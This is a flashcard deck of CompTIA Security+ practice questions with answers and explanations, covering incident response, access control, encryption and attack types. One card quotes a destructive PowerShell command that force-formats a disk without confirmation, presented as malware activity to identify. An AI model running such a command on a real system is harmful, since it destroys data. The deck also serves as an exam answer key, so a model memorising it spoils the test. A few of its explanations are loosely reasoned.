Communication plan A communication plan is a plan that would fulfill the requirement of keeping stakeholders at an organization aware of any incidents and receiving updates on status changes as they occur. A communication plan is a document that outlines the communication objectives, strategies, methods, channels, frequency, and audience for an incident response process. A communication plan can help an organization communicate effectively and efficiently with internal and external stakeholders during an incident and keep them informed of the incident’s impact, progress, resolution, and recovery.
48
A security analyst receives an alert that indicates a user's device is displaying anomalous behavior, the analyst suspects the device might be compromised. Which of the following should the analyst do first? A. Reboot the device B. Set the host-based firewall to deny any incoming connections C. Update the antivirus definitions on the device D. Isolate the device
Isolate the device Isolating the device is the first thing that a security analyst should do if they suspect that a user’s device might be compromised. Isolating the device means disconnecting it from the network or placing it in a separate network segment to prevent further communication with potential attackers or malicious hosts. Isolating the device can help contain the incident, limit the damage or data loss, preserve the evidence, and facilitate the investigation and remediation.
49
An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Select two.) A. Load balancing B. Incremental backups C. UPS D. RAID E. Dual power supply F. VLAN ## Footnote Uninterruptible Power Supply Redundant Array of Independent Disks (RAID) Virtual Local Area Network (VLAN)
Load balancing & RAID Load balancing and RAID are the best options to accomplish the objective of improving both server-data fault tolerance and site availability under high consumer load. Load balancing is a method of distributing network traffic across multiple servers to optimize performance, reliability, and scalability. Load balancing can help improve site availability by preventing server overload, ensuring high uptime, and providing redundancy and failover. RAID stands for redundant array of independent disks, which is a technology that combines multiple physical disks into a logical unit to improve data storage performance, reliability, and capacity. RAID can help improve server-data fault tolerance by providing data redundancy, backup, and recovery.
50
Which of the following would provide guidelines on how to label new network devices as part of the initial configuration? A. IP schema B. Application baseline configuration C. Standard naming convention policy D. Wireless LAN and network perimeter diagram ## Footnote Local Area Network (LAN)
Standard naming convention policy A standard naming convention policy would provide guidelines on how to label new network devices as part of the initial configuration. A standard naming convention policy is a document that defines the rules and formats for naming network devices, such as routers, switches, firewalls, servers, or printers. A standard naming convention policy can help an organization achieve consistency, clarity, and efficiency in network management and administration.
51
A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information? A. Dump file B. System log C. Web application log D. Security log
Dump file A dump file is the first thing that a security analyst should review to determine more information about a compromised device that displayed an error screen and shut down. A dump file is a file that contains a snapshot of the memory contents of a device at the time of a system crash or error. A dump file can help a security analyst analyze the cause and source of the crash or error, as well as identify any malicious code or activity that may have triggered it.
52
A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability. Which of the following would be the most cost-effective solution for the data center to implement? A. Uninterruptible power supplies with battery backup B. Managed power distribution units lo track these events C. A generator to ensure consistent, normalized power delivery D. Dual power supplies to distribute the load more evenly
Uninterruptible power supplies with battery backup Uninterruptible power supplies with battery backup would be the most cost-effective solution for the data center to implement to prevent under-voltage events following electrical grid maintenance outside the facility. An uninterruptible power supply (UPS) is a device that provides emergency power to a load when the main power source fails or drops below an acceptable level. A UPS with battery backup can help prevent under-voltage events by switching to battery power when it detects a voltage drop or outage in the main power source. A UPS with battery backup can also protect the data center equipment from power surges or spikes.
53
Which of the following roles is responsible for defining the protection type and classification type for a given set of files? A. General counsel B. Data owner C. Risk manager D. Chief Information Officer
Data owner Data owner is the role that is responsible for defining the protection type and classification type for a given set of files. Data owner is a person in the organization who is accountable for a certain set of data and determines how it should be protected and classified. General counsel is the role that provides legal advice and guidance to the organization. Risk manager is the role that identifies, analyzes, and mitigates risks to the organization. Chief Information Officer is the role that oversees the information technology strategy and operations of the organization.
54
During an assessment, a systems administrator found several hosts running FTP and decided to immediately block FTP communications at the firewall. Which of the following describes the greatest risk associated with using FTP? A. Private data can be leaked B. FTP is prohibited by internal policy. C. Users can upload personal files D. Credentials are sent in cleartext. ## Footnote File Transfer Protocol (FTP)
Credentials are sent in cleartext. Credentials are sent in cleartext is the greatest risk associated with using FTP. FTP is an old protocol that does not encrypt the data or the credentials that are transmitted over the network. This means that anyone who can capture the network traffic can see the usernames and passwords of the FTP users, as well as the files they are transferring. This can lead to data breaches, identity theft, and unauthorized access. ## Footnote Private data can be leaked (Option A) is a possible consequence of using FTP, but not the root cause of the risk. FTP is prohibited by internal policy (Option B) is a compliance issue, but not a technical risk. Users can upload personal files (Option C) is a management issue, but not a security risk.
55
During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability? A. Legacy operating system B. Weak configuration C. Zero day D. Supply chain
Zero day A zero-day vulnerability is a security flaw that is unknown to the vendor and the public, and therefore has no patch or fix available. A zero-day attack is an exploit that takes advantage of a zero-day vulnerability before the vendor or the security community becomes aware of it. A zero-day attack can cause serious damage to a system or network, as there is no defense against it until a patch is released.
56
A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials? A. MFA B. Lockout C. Time-based logins D. Password history ## Footnote multi-factor authentication (MFA)
MFA MFA stands for multi-factor authentication, which is a method of verifying a user’s identity using two or more factors, such as something you know (e.g., password), something you have (e.g., token), or something you are (e.g., biometrics). MFA can prevent someone from using the exfiltrated credentials, as they would need to provide another factor besides the username and password to access the system or application. MFA can also alert the legitimate user of an unauthorized login attempt, allowing them to change their credentials or report the incident.
57
Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed? A. A full inventory of all hardware and software B. Documentation of system classifications C. A list of system owners and their departments D. Third-party risk assessment documentation
A full inventory of all hardware and software A full inventory of all hardware and software would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed, as it would allow the analyst to identify which systems and applications are affected by the vulnerability and prioritize the remediation efforts accordingly. A full inventory would also help the analyst to determine the impact and likelihood of a successful exploit, as well as the potential loss of confidentiality, integrity and availability of the data and services.
58
An organization is repairing the damage after an incident. Which of the following controls is being implemented? A. Detective B. Preventive C. Corrective D. Compensating
Corrective A corrective control is a type of security control that is designed to mitigate the damage caused by a security incident or to restore the normal operations after an incident. A corrective control can include actions such as restoring from backups, applying patches, isolating infected systems, or implementing new policies and procedures. A corrective control is different from a preventive control, which aims to stop an incident from happening, or a detective control, which aims to identify and record an incident.
59
Which of the following supplies non-repudiation during a forensics investigation? A. Dumping volatile memory contents first B. Duplicating a drive with dd C. Using a SHA-2 signature of a drive image D. Logging everyone in contact with evidence E. Encrypting sensitive data ## Footnote Secure Hash Algorithm 2 (SHA-2)
Using a SHA-2 signature of a drive image Using a SHA-2 signature of a drive image is a way to supply non-repudiation during a forensics investigation, as it can verify the integrity and authenticity of the data captured in the image. SHA-2 is a family of secure hash algorithms that can produce a unique and fixed-length digest of any input data. By hashing the drive image and comparing the signature with the original hash, the investigator can prove that the image has not been altered or tampered with since the time of acquisition. This can also help to identify the source of the data and prevent any denial from the suspect.
60
A financial institution would like to store its customer data in the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution Is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would best meet the requirement? A. Asymmetric B. Symmetric C. Homomorphic D. Ephemeral
Homomorphic Homomorphic encryption is a cryptographic technique that allows data to be stored, accessed and manipulated while encrypted. Homomorphic encryption enables computations to be performed on ciphertexts, generating an encrypted result that, when decrypted, matches the result of the operations as if they had been performed on the plaintext. Homomorphic encryption can prevent the cloud service provider from being able to decipher the data due to its sensitivity, as the data remains encrypted at all times. Homomorphic encryption is not concerned about computational overheads and slow speeds, as it trades off performance for security and privacy.
61
A user downloaded an extension for a browser, and the user's device later became infected. The analyst who is investigating the incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running: New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false Which of the following is the malware using to execute the attack? A. PowerShell B. Python C. Bash D. Macros
PowerShell PowerShell is a scripting language and command-line shell that can be used to automate tasks and manage systems. PowerShell can also be used by malware to execute malicious commands and evade detection. ## Footnote The code snippet in the question is a PowerShell command that creates a new partition on disk 2, formats it with NTFS file system, and assigns it a drive letter C. This could be part of an attack that wipes out the original data on the disk or creates a hidden partition for storing malware or stolen data.
62
Which of the following describes the exploitation of an interactive process to gain access to restricted areas? A. Persistence B. Port scanning C. Privilege escalation D. Pharming
Privilege escalation Privilege escalation describes the exploitation of an interactive process to gain access to restricted areas. It is a type of attack that allows a normal user to obtain higher privileges or access rights on a system or network, such as administrative or root access. Privilege escalation can be achieved by exploiting a vulnerability, design flaw, or misconfiguration in the system or application. Privilege escalation can allow an attacker to perform unauthorized actions, such as accessing sensitive data, installing malware, or compromising other systems.
63
Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll? A. SCAP B. NetFlow C. Antivirus D. DLP ## Footnote Security Content Automation Protocol (SCAP) Personally Identifiable Information (PII) Data Loss Prevention (DLP)
DLP DLP stands for Data Loss Prevention, which is a technology that can monitor, detect and prevent the unauthorized transmission of sensitive data, such as PII (Personally Identifiable Information). DLP can be implemented on endpoints, networks, servers or cloud services to protect data in motion, in use or at rest. DLP can also block or alert on data transfers that violate predefined policies or rules. DLP is the best tool to assist with detecting an employee who has accidentally emailed a file containing a customer’s PII, as it can scan the email content and attachments for any data that matches the criteria of PII and prevent the email from being sent or notify the administrator of the incident.
63
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the best mitigation strategy to prevent this from happening in the future? A. User training B. CASB C. MDM D. EDR ## Footnote Corporate-owned Personally Enabled (COPE) Cloud Access Security Broker (CASB) mobile device management (MDM) Endpoint Detection and Response (EDR)
MDM MDM stands for mobile device management, which is a solution that allows organizations to manage and secure mobile devices used by employees. MDM can help prevent data loss and leakage by enforcing policies and restrictions on the devices, such as encryption, password, app installation, remote wipe, and so on. MDM can also monitor and audit the device activity and compliance status. MDM can be the best mitigation strategy to prevent data leakage from an employee’s COPE tablet via cloud storage, as it can block or limit the access to cloud services, or apply data protection measures such as containerization or encryption.
64
Which of the following best reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement? A. Implement proper network access restrictions. B. Initiate a bug bounty program. C. Classify the system as shadow IT. D. Increase the frequency of vulnerability scans.
Implement proper network access restrictions. Network access restrictions can limit the exposure of systems that have expired vendor support and lack an immediate replacement, as they can prevent unauthorized or unnecessary access to those systems from other devices or networks. Network access restrictions can include firewalls, network segmentation, VPNs, access control lists, and other methods that can filter or block traffic based on predefined rules or policies. Network access restrictions can reduce the security risks introduced by running systems that have expired vendor support, as they can mitigate the impact of potential vulnerabilities or exploits that may affect those systems.
65
Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases? A. Privacy B. Availability C. Integrity D. Confidentiality
Integrity Integrity is a security concept that ensures that data is accurate, complete and consistent, and that it has not been tampered with or modified in an unauthorized or unintended way. Integrity is important for e-commerce organizations to protect against erroneous purchases, as it can prevent data corruption, duplication, loss or manipulation that could affect the transactions or the records of the customers. Integrity can be achieved by using methods such as hashing, digital signatures, checksums, encryption and access control.
66
A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack? A. DLP B. SIEM C. NIDS D. WAF ## Footnote Application programming interface (API) Security Information and Event Management (SIEM) Network-based Intrusion Detection System (NIDS) Web Application Firewall (WAF)
WAF WAF stands for Web Application Firewall, which is a type of firewall that can monitor, filter and block web traffic to and from web applications. WAF can protect web applications from common attacks such as cross-site scripting (XSS), SQL injection, directory traversal, buffer overflow and more. WAF can also enforce security policies and rules that can prevent parameter manipulation or tampering by an unknown third party. WAF is the best solution to help protect against the attack on the web API, as it can inspect the HTTP requests and responses and block any malicious or anomalous activity.
67
A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would bast prevent email contents from being released should another breach occur? A. Implement S/MIME to encrypt the emails at rest. B. Enable full disk encryption on the mail servers. C. Use digital certificates when accessing email via the web. D. Configure web traffic to only use TLS-enabled channels. ## Footnote Secure/Multipurpose Internet Mail Extensions (S/MIME) Transport Layer Security (TLS)
Implement S/MIME to encrypt the emails at rest. S/MIME stands for Secure/Multipurpose Internet Mail Extensions, which is a standard for encrypting and digitally signing email messages. S/MIME can provide confidentiality, integrity, authentication and non-repudiation for email communications. S/MIME can encrypt the emails at rest, which means that the email contents are protected even if they are stored on the mail servers or the user inboxes. S/MIME can prevent email contents from being released should another breach occur, as the attacker would not be able to decrypt or read the encrypted emails without the proper keys or certificates.
68
An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office? A. Always-on B. Remote access C. Site-to-site D. Full tunnel ## Footnote virtual private network (VPN)
Site-to-site Site-to-site VPN is a type of VPN solution that connects two or more networks or sites across the public internet in a secure and encrypted way. Site-to-site VPN can be implemented using VPN appliances, such as firewalls or routers, that can establish and maintain the VPN tunnel between the sites. Site-to-site VPN can support multiple users or devices that need to access resources on the other site without requiring individual VPN clients or software. Site-to-site VPN is the best solution to support the new remote office, as it can provide secure and seamless connectivity between the office network and the main network of the organization.
68
A security analyst needs to implement security features across smartphones. laptops, and tablets. Which of the following would be the most effective across heterogeneous platforms? A. Enforcing encryption B. Deploying GPOs C. Removing administrative permissions D. Applying MDM software ## Footnote Group Policy Objects (GPOs) Mobile Device Management (MDM)
Applying MDM software MDM stands for Mobile Device Management, which is a software solution that can manage and secure smartphones, laptops, tablets and other mobile devices across heterogeneous platforms. MDM can enforce security features such as encryption, password policies, remote wipe, device tracking, app control and more. MDM can also monitor and update the devices remotely and provide reports and alerts on their status. MDM is the most effective solution to implement security features across heterogeneous platforms, as it can provide centralized and consistent management of various types of devices.
69
A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommended? A. A content filter B. A WAF C. A next-generation firewall (NGFW) D. An IDS ## Footnote Intrustion Detection System (IDS)
A next-generation firewall A next-generation firewall (NGFW) is a solution that can defend against malicious actors misusing protocols and being allowed through network defenses. A NGFW is a type of firewall that can perform deep packet inspection, application-level filtering, intrusion prevention, malware detection, and identity-based access control. A NGFW can also use threat intelligence and behavioral analysis to identify and block malicious traffic based on protocols, signatures, or anomalies.
70
An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing? A. DLP B. VPC C. CASB D. Content filtering ## Footnote Data Loss Prevention (DLP) virtual private cloud (VPC) cloud access security broker (CASB)
CASB A cloud access security broker (CASB) is a technology that can restrict access to internet services to authorized users only and control the actions each user can perform on each service. A CASB is a type of software or service that acts as an intermediary between users and cloud service providers. A CASB can enforce security policies, monitor user activity, detect and prevent data leaks, encrypt data, and provide visibility and auditability of cloud usage.
71
An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it? A. Data custodian B. Data controller C. Data protection officer D. Data processor
Data controller A data controller is an employee role that would determine the purpose of data and how to process it. A data controller is a person or entity that decides why and how personal data is collected, used, stored, shared, or deleted. A data controller has the responsibility to comply with data protection laws and regulations, such as the General Data Protection Regulation (GDPR), and to ensure the rights and privacy of data subjects.
72
A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action? A. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller. B. Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone. C. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer. D. Request the caller send an email for identity verification and provide the requested information via email to the caller.
Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer. This is the best course of action for the help desk technician because it can help prevent a potential social engineering attack. Social engineering is a technique that involves manipulating or deceiving people into revealing sensitive information or performing actions that compromise security. The caller may be impersonating a member of the organization’s cybersecurity incident response team to obtain the network’s internal firewall IP address, which could be used for further attacks. The help desk technician should not provide any information over the phone without verifying the caller’s identity and authorization. The help desk technician should also report the incident to the organization’s cybersecurity officer for investigation and response.
73
Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would best meet this need? A. Community B. Private C. Public D. Hybrid
Community A community cloud deployment strategy would best meet the need of several universities participating in a collaborative research project and needing to share compute and storage resources. A community cloud is a type of cloud service model that provides a shared platform for multiple organizations with common interests, goals, or requirements. A community cloud can offer benefits such as cost savings, scalability, security, privacy, compliance, and collaboration.
74
An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding credit card statement with unusual purchases. Which of the following attacks took place? A. On-path attack B. Protocol poisoning C. Domain hijacking D. Bluejacking
On-path attack An on- path attack is a type of network attack that involves intercepting or modifying traffic between two parties by placing oneself in the communication path. An on-path attack can also be called a man-in-the-middle attack or a session hijacking attack. An on-path attacker can steal sensitive information, such as credit card details, or redirect the user to a malicious website.
75
A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing? A. Cross-site scripting B. Buffer overflow C. Jailbreaking D. Side loading
Jailbreaking Jailbreaking is the vulnerability that the organization is addressing by adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Jailbreaking is the process of removing the restrictions or limitations imposed by the manufacturer or carrier on a mobile device, such as an iPhone or iPad. Jailbreaking can allow users to install unauthorized applications, customize settings, or access system files. However, jailbreaking can also expose the device to security risks, such as malware, data loss, or warranty voidance.
76
Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems? A. Red B. Blue C. Purple D. Yellow
Purple A purple team combines both offensive and defensive testing techniques to protect an organization’s critical systems. A purple team is a type of cybersecurity team that consists of members from both the red team and the blue team. The red team performs simulated attacks on the organization’s systems, while the blue team defends against them. The purple team facilitates the collaboration and communication between the red team and the blue team, and provides feedback and recommendations for improvement. A purple team can help the organization identify and remediate vulnerabilities, enhance security controls, and increase resilience.
77
A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent? A. Accept B. Transfer C. Mitigate D. Avoid
Transfer A company purchased cyber insurance to address items listed on the risk register. This represents a transfer strategy. A transfer strategy involves transferring or sharing some or all of the responsibility or impact of a risk to another party, such as an insurer, a supplier, or a partner. A transfer strategy can help to reduce the financial liability or exposure of the company in case of a security incident or breach.
78
A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring? A. A worm is propagating across the network. B. Data is being exfiltrated. C. A logic bomb is deleting data. D. Ransomware is encrypting files. ## Footnote domain name system (DNS)
Data is being exfiltrated. Data is being exfiltrated when an internal system is sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Data exfiltration is the unauthorized transfer of data from a system or network to an external destination or actor. Data exfiltration can be performed by malicious insiders or external attackers who have compromised the system or network. DNS queries are requests for resolving domain names to IP addresses. DNS queries can be used as a covert channel for data exfiltration by encoding data in the domain names or subdomains and sending them to a malicious DNS server that can decode and collect the data.
79
Which of the following would be most effective to contain a rapidly spreading attack that is affecting a large number of organizations? A. Machine learning B. DNS sinkhole C. Blocklist D. Honey pot ## Footnote domain name system (DNS)
DNS sinkhole A DNS sinkhole would be most effective to contain a rapidly spreading attack that is affecting a large number of organizations. A DNS sinkhole is a technique that involves redirecting malicious or unwanted domain names to an alternative IP address, such as a black hole, a honeypot, or a warning page. A DNS sinkhole can help to prevent or disrupt the communication between infected systems and command-and-control servers, malware distribution sites, phishing sites, or botnets. A DNS sinkhole can also help to identify and isolate infected systems by monitoring the traffic to the sinkhole IP address.
80
Developers are writing code and merging it into shared repositories several times a day where it is tested automatically. Which of the following concepts does this best represent? A. Functional testing B. Stored procedures C. Elasticity D. Continuous Integration
Continuous Integration Continuous Integration is the concept that best represents developers writing code and merging it into shared repositories several times a day, where it is tested automatically. Continuous Integration is a software development practice that involves integrating code changes from multiple developers into a shared repository frequently and running automated tests to ensure quality and functionality. Continuous Integration can help to detect and fix errors early, improve collaboration, reduce rework, and accelerate delivery.
81
During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst? A. A vulnerability scanner B. A NGFW C. The Windows Event Viewer D. A SIEM ## Footnote Endpoint Detection and Response (EDR) New Generation Firewall (NGFW) Security Information and Event Management (SIEM)
A SIEM A security information and event management (SIEM) system will best assist the analyst to review the correlated logs to find the source of the incident. A SIEM system is a type of software or service that collects, analyzes, and correlates logs and events from multiple sources, such as firewalls, EDR systems, servers, or applications. A SIEM system can help to detect and respond to security incidents, provide alerts and reports, support investigations and forensics, and comply with regulations.
82
The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two). A. Geolocation B. Time-of-day restrictions C. Certificates D. Tokens E. Geotagging F. Role-based access controls
Geolocation & Time-of-day restrictions Geolocation and time-of-day restrictions would be best to mitigate the CEO’s concerns about staff members working from high-risk countries while on holiday or outsourcing work to a third-party organization in another country. Geolocation is a technique that involves determining the physical location of a device or user based on its IP address, GPS coordinates, Wi-Fi signals, or other indicators. Time-of-day restrictions are policies that limit the access or usage of resources based on the time of day or week. Geolocation and time-of-day restrictions can help to enforce access control rules, prevent unauthorized access, detect anomalous behavior, and comply with regulations.
83
Which of the following is used to validate a certificate when it is presented to a user? A. OCSP B. CSR C. CA D. CRC ## Footnote Online Certificate Status Protocol (OCSP) Certificate Signing Request (CSR) Certificate Authority (CA) Cyclic Redundancy Check (CRC)
OCSP Online Certificate Status Protocol (OCSP) is used to validate a certificate when it is presented to a user. OCSP is a protocol that allows a client or browser to query the status of a certificate from an OCSP responder, which is a server that maintains and provides the revocation status of certificates issued by a certificate authority (CA). OCSP can help to verify the authenticity and validity of a certificate and prevent the use of revoked or expired certificates.
84
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking a link. Which of the following was most likely observed? A. DLL injection B. Session replay C. SQLi D. XSS ## Footnote Dynamic-link Library Structured Query Language Injection (SQLi) Cross-Site Scripting (XSS)
XSS Cross-site scripting is a type of web application attack that involves injecting malicious code or scripts into a trusted website or application. The malicious code or script can execute in the browser of the victim who visits the website or application, and can perform actions such as stealing cookies, redirecting to malicious sites, displaying fake content, or compromising the system.

CompTIA Sec+ SY0-701 (22 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2025 Bold Learning Solutions. Terms and Conditions